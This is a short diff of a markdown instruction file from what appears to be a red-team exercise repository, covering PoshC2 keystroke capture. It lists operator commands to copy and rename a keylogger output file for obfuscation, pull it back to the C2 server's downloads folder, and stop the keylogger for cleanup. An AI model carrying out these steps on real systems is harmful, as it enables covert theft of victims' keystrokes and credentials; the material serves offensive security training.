ChefDandy/CTE-menu/Poshc2/instructions/Input_capture.md

 copy "C:\keystroke file location" C:\sameplace with new filename ##Change the name for obfuscation/readability

-Download-file C:\sameplace with new filename ## Gets put into /var/poshc2/*projectname*/downloads
+Download-file "C:\sameplace with new filename" ## Gets put into /var/poshc2/*projectname*/downloads

 Stop-Keystrokes ##Stop keylogger for cleanup